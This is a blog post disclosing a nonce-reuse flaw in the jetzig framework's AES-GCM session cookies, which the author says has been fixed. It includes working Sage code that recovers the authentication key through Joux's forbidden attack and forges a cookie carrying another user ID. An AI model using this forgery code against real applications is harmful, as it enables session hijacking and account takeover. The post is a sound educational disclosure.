Nonce reuse: not even once - Superficial Reflections

In this blog post, I will demonstrate how a mistake in jetzig’s session implementation could be used to break the confidentiality and integrity of session data. A fix has been applied, so the attack shown below no longer works. All code samples in this post are Python, due to Python’s excellent math support through Sage. This post is also available as a Sage notebook if you want to follow along interactively.

tl;dr: A nonce must never be used twice.

About jetzig’s sessions

Jetzig is a web framework for Zig. For convenience, it comes with a session implementation that is based on encrypted cookies: the server side encrypts all data with a key unknown to the client and stores the encrypted data in a cookie. When the client sends the cookie back, the server decrypts it and, if decryption succeeds, knows that the data originated from the server at some point.

The implementation of the encrypted cookie is (conceptually) as follows:

import json
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# In jetzig's implementation, this is read from the `JETZIG_SECRET` environment variable
# It's only hardcoded here for demonstration purposes
SECRET = bytes(range(0, 44))

def encrypt(data):
    key = SECRET[:256 // 8]
    nonce = SECRET[len(key):]
    json_data = json.dumps(data).encode("utf-8")
    return AESGCM(key).encrypt(nonce, json_data, None)

The result of encrypt would then be set as cookie data.

If you have a working knowledge of cryptography, you might already have spotted the issue here. If not, I’ll explain it later on.

Let’s try it with some values:

session_1234 = encrypt({"user_id": "1234"})
session_9876 = encrypt({"user_id": "9876"})

print(session_1234)
print(session_9876)

b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc6\xca\xe4k\x91B\xec\xf5D\xa5`\x88\xca\xcc\xd8\t\x8f\x01,\t&'
b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3!\xcc\xce\xe6k\x91\x882f\x03a\x0e\xbe\x15Uk.\xb3\x06\x1e\x80&'

Interesting. The values start the same. Let’s XOR them: bytes that are identical in both values become \x00. Let’s start with a little helper, because XOR will be used quite a lot:

def xor(a, b):
    # In Sage, ^^ is used for XOR instead of ^ like in regular Python
    return bytes(byte_a ^^ byte_b for byte_a, byte_b in zip(a, b))

Now let’s XOR the two session values:

xor(session_1234, session_9876)

b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\n\x04\x02\x00\x00\xca\xde\x93G\xc4n6\xdf\x99\xb3'<\x072\x89\x00"

So the values start out identical, then differ in a few bytes, are briefly identical again, and then differ again. What happens if we XOR 1234 and 9876, our two user IDs?

xor(b"1234", b"9876")

b'\x08\n\x04\x02'

Oh look. It’s exactly one of the differences between the two session cookie values. In fact, if you know the plain value of one session cookie, you can use it to decrypt the other session cookie:

# Let's assume we know the plain value for the 1234 session, so we XOR it against the encrypted value
cipher_xor = xor(session_1234, b'{"user_id": "1234"}')
# And then use the resulting XOR against the 9876 session
plain_9876 = xor(session_9876, cipher_xor)
# And we get back the plain value for the other session
plain_9876

b'{"user_id": "9876"}'

Not super great. Also not super bad. First, you probably don’t know the plain session content (though you can guess at least parts of it, e.g. the JSON delimiters). Second, once you know another user’s cookie value, you can simply use it to access the application on behalf of that user (this is known as session hijacking), no XOR tricks necessary. Luckily for other users, you don’t know their cookie values, only your own.
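Why does the XOR trick work at all? AES-GCM encrypts in counter mode: the key and nonce determine a keystream, and the ciphertext is the plaintext XORed with that keystream. Same key and same nonce means same keystream, so it cancels out when two ciphertexts are XORed. The following is a minimal sketch of that effect in plain Python (hence ^ instead of Sage’s ^^). Note that toy_keystream and toy_encrypt are hypothetical helpers built on SHA-256, used here only as a stand-in for AES in counter mode; they are not what jetzig or the cryptography package do internally.

```python
import hashlib

def toy_keystream(key, nonce, length):
    # Hypothetical stand-in for AES-CTR: the keystream depends only on key and nonce
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def toy_encrypt(key, nonce, plaintext):
    # Stream cipher encryption: plaintext XOR keystream
    stream = toy_keystream(key, nonce, len(plaintext))
    return bytes(p ^ s for p, s in zip(plaintext, stream))

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

key = bytes(range(32))
fixed_nonce = bytes(range(32, 44))
p1 = b'{"user_id": "1234"}'
p2 = b'{"user_id": "9876"}'

# Same key, same nonce: the keystream cancels and only the plaintext XOR remains
c1 = toy_encrypt(key, fixed_nonce, p1)
c2 = toy_encrypt(key, fixed_nonce, p2)
leaks = xor_bytes(c1, c2) == xor_bytes(p1, p2)

# Same key, different nonce: the keystreams differ and nothing cancels
c3 = toy_encrypt(key, b"another nonce", p2)
leaks_with_fresh_nonce = xor_bytes(c1, c3) == xor_bytes(p1, p2)

print(leaks, leaks_with_fresh_nonce)
```

With the shared nonce the comparison holds, with a different nonce it does not. That is the whole confidentiality problem in one line.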

Modifying session values

So you don’t know other users’ cookie values, but you know your own. And you know exactly where the user ID is stored in the session, for example because you signed up twice, got two different cookie values and XORed them. Couldn’t you use this to modify the session and put in a different ID? To test this, let me add a function that decrypts session cookie values again:

def decrypt(data):
    key = SECRET[:256 // 8]
    nonce = SECRET[len(key):]
    json_data = AESGCM(key).decrypt(nonce, data, None)
    return json.loads(json_data)

Does it work?

decrypt(session_1234)

{'user_id': '1234'}

Looks good. Next, let’s construct a new session cookie value. From earlier, you know that XORing the encrypted value with the plain value and then XORing the result with another encrypted value gives you the other plain value. So XORing that same result with a plain value of your choice should give you the matching encrypted value:

# User ID's start index
start_idx = len(b'{"user_id": "')
cipher_xor = xor(session_1234[start_idx:start_idx + len(b"1234")], b"1234")
new_value = (
    session_1234[:start_idx] + xor(b"1337", cipher_xor) + session_1234[start_idx + len(b"1234"):]
)
new_value

b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc7\xca\xe7k\x91B\xec\xf5D\xa5`\x88\xca\xcc\xd8\t\x8f\x01,\t&'

Doesn’t look too bad. Now let’s try to use it:

try:
    decrypt(new_value)
except Exception as e:
    print("No success :(")
    print(f"Exception is {e!r}")

No success :(
Exception is InvalidTag()

Oh snap. Why does it throw an InvalidTag exception? It is because jetzig uses AES-GCM to encrypt session cookies. AES-GCM is an authenticated encryption scheme, which means it’s designed to prevent exactly what we tried to achieve: it detects that an encrypted value was modified. To achieve this, an additional tag is appended to the encrypted value. The tag is a keyed hash of (among other things) the encrypted value. This tag is the second run of differences we saw when we XORed session_1234 with session_9876 above.
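To see this in the actual bytes, here is a small plain-Python sketch that splits the two values from above into ciphertext and tag. It relies on the 16-byte tag being appended to the ciphertext; split and TAG_LEN are names made up for this illustration.

```python
TAG_LEN = 16  # the tag is the last 16 bytes of each value

# Values copied from the outputs above
session_1234 = b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc6\xca\xe4k\x91B\xec\xf5D\xa5`\x88\xca\xcc\xd8\t\x8f\x01,\t&'
new_value = b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc7\xca\xe7k\x91B\xec\xf5D\xa5`\x88\xca\xcc\xd8\t\x8f\x01,\t&'

def split(value):
    # Returns (ciphertext, tag)
    return value[:-TAG_LEN], value[-TAG_LEN:]

cipher_old, tag_old = split(session_1234)
cipher_new, tag_new = split(new_value)

# Positions at which the modified ciphertext differs from the original
changed = [i for i, (a, b) in enumerate(zip(cipher_old, cipher_new)) if a != b]

print(len(cipher_old))     # ciphertext is as long as the JSON plaintext
print(changed)             # only bytes inside the user ID changed
print(tag_old == tag_new)  # the tag was copied over unchanged
```

The ciphertext changed, but the tag still belongs to the old ciphertext, so decryption rejects the value.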

Unfortunately, when nonces are reused in AES-GCM (and that is exactly what jetzig did, perhaps you already spotted it right at the beginning), it’s possible to recover the authentication key used to calculate the authentication tag. This is known as the forbidden attack, described by Antoine Joux in “Authentication Failures in NIST version of GCM”. A more detailed description of how the attack works can be found in “Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS” by Hanno Böck, Aaron Zauner, Sean Devlin, Juraj Somorovsky and Philipp Jovanovic.

Roughly sketched out, the attack works because AES-GCM uses a hash function called GHASH for the authentication tag. GHASH is defined as a computation over the Galois field GF(2¹²⁸), and this field is defined by the polynomial x¹²⁸ + x⁷ + x² + x + 1. The tag is the GHASH value XORed with a mask that depends only on key and nonce. Because the nonce is used twice, that mask cancels when the tags of two messages are XORed, and the authentication key becomes a root of a polynomial over this field whose coefficients are known from the two ciphertexts and tags. Again, see Böck et al.’s paper for more details.
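To make this a bit more concrete for the two 19-byte ciphertexts above (two 16-byte blocks C₁ and C₂, the second one zero-padded, no associated data): the tag is T = C₁·H³ + C₂·H² + L·H + S, where H is the authentication key, L encodes the lengths and S is a mask that depends only on key and nonce. For a second message with the same nonce, T′ = C₁′·H³ + C₂′·H² + L·H + S. Adding both (addition in this field is XOR) cancels L·H and S and leaves (C₁ + C₁′)·H³ + (C₂ + C₂′)·H² + (T + T′) = 0. The following plain-Python sketch checks that identity. The real H and S are unknown without the secret key, so random stand-ins are used; gf_mul, block and toy_tag are hypothetical helper names, and the multiplication follows the usual bit-by-bit method for GCM’s bit order.

```python
import secrets

R = 0xE1 << 120  # x^128 = x^7 + x^2 + x + 1, written in GCM's reflected bit order

def gf_mul(x, y):
    # Multiplication in GF(2^128); the most significant bit is the coefficient of x^0
    z, v = 0, y
    for i in range(127, -1, -1):
        if (x >> i) & 1:
            z ^= v
        v = (v >> 1) ^ R if v & 1 else v >> 1
    return z

def block(data):
    # Zero-pad to 16 bytes and read as a big-endian integer
    return int.from_bytes(data.ljust(16, b"\x00"), "big")

def toy_tag(h, s, ciphertext):
    # GHASH over the ciphertext only (no associated data), masked with s
    acc = 0
    for i in range(0, len(ciphertext), 16):
        acc = gf_mul(acc ^ block(ciphertext[i:i + 16]), h)
    acc = gf_mul(acc ^ (8 * len(ciphertext)), h)  # length block
    return acc ^ s

# Random stand-ins (assumptions): the real values depend on the secret key
h = secrets.randbits(128)
s = secrets.randbits(128)

# Ciphertext parts (without tags) of the two session values from above
c1 = b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc6\xca\xe4k\x91'
c2 = b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3!\xcc\xce\xe6k\x91'
t1 = toy_tag(h, s, c1)
t2 = toy_tag(h, s, c2)

# Evaluate (C1 + C1')*H^3 + (C2 + C2')*H^2 + (T + T') at H
h2 = gf_mul(h, h)
h3 = gf_mul(h2, h)
d1 = block(c1[:16]) ^ block(c2[:16])
d2 = block(c1[16:]) ^ block(c2[16:])
value = gf_mul(d1, h3) ^ gf_mul(d2, h2) ^ t1 ^ t2

print(value == 0)
```

An attacker knows every coefficient of that polynomial, so the candidates for H are simply its roots.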

The following code uses the idea from above (modify the encrypted value), but additionally also calculates the correct authentication tag for the modified value:

# The following code was initially taken from https://github.com/jvdsn/crypto-attacks/blob/master/attacks/gcm/forbidden_attack.py
# Copyright (c) 2020 Joachim Vandersmissen and released under the MIT license

from sage.all import GF

x = GF(2)["x"].gen()
gf2e = GF(2 ** 128, name="y", modulus=x ** 128 + x ** 7 + x ** 2 + x + 1)


def _to_gf2e(n):
    """
    Converts an integer to a gf2e element, little endian.
    """
    return gf2e([(n >> i) & 1 for i in range(127, -1, -1)])


def _from_gf2e(p):
    """
    Converts a gf2e element to an integer, little endian.
    """
    n = p.to_integer()
    ans = 0
    for i in range(128):
        ans <<= 1
        ans |= ((n >> i) & 1)

    return ans


def _ghash(h, a, c):
    """
    Calculates the GHASH polynomial.
    """
    la = len(a)
    lc = len(c)
    p = gf2e(0)
    for i in range(la // 16):
        p += _to_gf2e(int.from_bytes(a[16 * i:16 * (i + 1)], byteorder="big"))
        p *= h

    if la % 16 != 0:
        p += _to_gf2e(int.from_bytes(a[-(la % 16):] + bytes(16 - la % 16), byteorder="big"))
        p *= h

    for i in range(lc // 16):
        p += _to_gf2e(int.from_bytes(c[16 * i:16 * (i + 1)], byteorder="big"))
        p *= h

    if lc % 16 != 0:
        p += _to_gf2e(int.from_bytes(c[-(lc % 16):] + bytes(16 - lc % 16), byteorder="big"))
        p *= h

    p += _to_gf2e(((8 * la) << 64) | (8 * lc))
    p *= h
    return p


def recover_possible_auth_keys(a1, c1, t1, a2, c2, t2):
    """
    Recovers possible authentication keys from two messages encrypted with the same authentication key.
    More information: Joux A., "Authentication Failures in NIST version of GCM"
    :param a1: the associated data of the first message (bytes)
    :param c1: the ciphertext of the first message (bytes)
    :param t1: the authentication tag of the first message (bytes)
    :param a2: the associated data of the second message (bytes)
    :param c2: the ciphertext of the second message (bytes)
    :param t2: the authentication tag of the second message (bytes)
    :return: a generator generating possible authentication keys (gf2e element)
    """
    h = gf2e["h"].gen()
    p1 = _ghash(h, a1, c1) + _to_gf2e(int.from_bytes(t1, byteorder="big"))
    p2 = _ghash(h, a2, c2) + _to_gf2e(int.from_bytes(t2, byteorder="big"))
    for h, _ in (p1 + p2).roots():
        yield h

def forge_tag(h, a, c, t, target_a, target_c):
    """
    Forges an authentication tag for a target message given a message with a known tag.
    This method is best used with the authentication keys generated by the recover_possible_auth_keys method.
    More information: Joux A., "Authentication Failures in NIST version of GCM"
    :param h: the authentication key to use (gf2e element)
    :param a: the associated data of the message with the known tag (bytes)
    :param c: the ciphertext of the message with the known tag (bytes)
    :param t: the known authentication tag (bytes)
    :param target_a: the target associated data (bytes)
    :param target_c: the target ciphertext (bytes)
    :return: the forged authentication tag (bytes)
    """
    ghash = _from_gf2e(_ghash(h, a, c))
    target_ghash = _from_gf2e(_ghash(h, target_a, target_c))
    return (
        ghash ^^ int.from_bytes(t, byteorder="big") ^^ target_ghash
    ).to_bytes(16, byteorder="big")

# The last 16 bytes are the authentication tag
cipher_1234 = session_1234[:-16]
tag_1234 = session_1234[-16:]
cipher_9876 = session_9876[:-16]
tag_9876 = session_9876[-16:]

# Construct a new encrypted value by replacing the encrypted user ID with a different encrypted ID
# This is possible because the plain value for the user ID is known (it's typically displayed
# somewhere in an application)
user_id_xor = xor(cipher_1234[-len(b"1234") - 2:-2], b"1234")
attack_cipher = cipher_1234[:-len(b"1234") - 2] + xor(user_id_xor, b"1337") + cipher_1234[-2:]

# Recover the auth key and calculate a tag for our encrypted value
possible_key = next(
    recover_possible_auth_keys(b"", cipher_1234, tag_1234, b"", cipher_9876, tag_9876)
)
tag = forge_tag(possible_key, b"", cipher_1234, tag_1234, b"", attack_cipher)
attack_value = attack_cipher + tag
attack_value

b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc7\xca\xe7k\x91e\x1am\x97\x82S8\xaa<Jr\x9d\xbd\x82\xf7\xc8'

Let’s see whether I got lucky (the polynomial can have more than one root, and the code above simply takes the first candidate):

decrypt(attack_value)

{'user_id': '1337'}

Great success.
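The way to avoid all of this is the tl;dr from the top: never use a nonce twice with the same key. This post does not show jetzig’s actual fix, so the following is only a generic sketch of one common approach: draw a fresh random 96-bit nonce for every encryption and store it in front of the ciphertext. encrypt_fresh and decrypt_fresh are hypothetical names, and the key is generated on the spot just for the demonstration.

```python
import json
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

NONCE_LEN = 12  # 96 bits

def encrypt_fresh(key, data):
    # A new random nonce for every call; it is not secret, so it can travel with the cookie
    nonce = os.urandom(NONCE_LEN)
    json_data = json.dumps(data).encode("utf-8")
    return nonce + AESGCM(key).encrypt(nonce, json_data, None)

def decrypt_fresh(key, value):
    # Split off the nonce that encrypt_fresh put in front
    nonce, ciphertext = value[:NONCE_LEN], value[NONCE_LEN:]
    return json.loads(AESGCM(key).decrypt(nonce, ciphertext, None))

key = AESGCM.generate_key(bit_length=256)
first = encrypt_fresh(key, {"user_id": "1234"})
second = encrypt_fresh(key, {"user_id": "1234"})

print(first != second)            # same plaintext, different cookie values
print(decrypt_fresh(key, first))
```

Random nonces can still collide if enough values are encrypted under one key, so this is a sketch of the idea rather than a complete design.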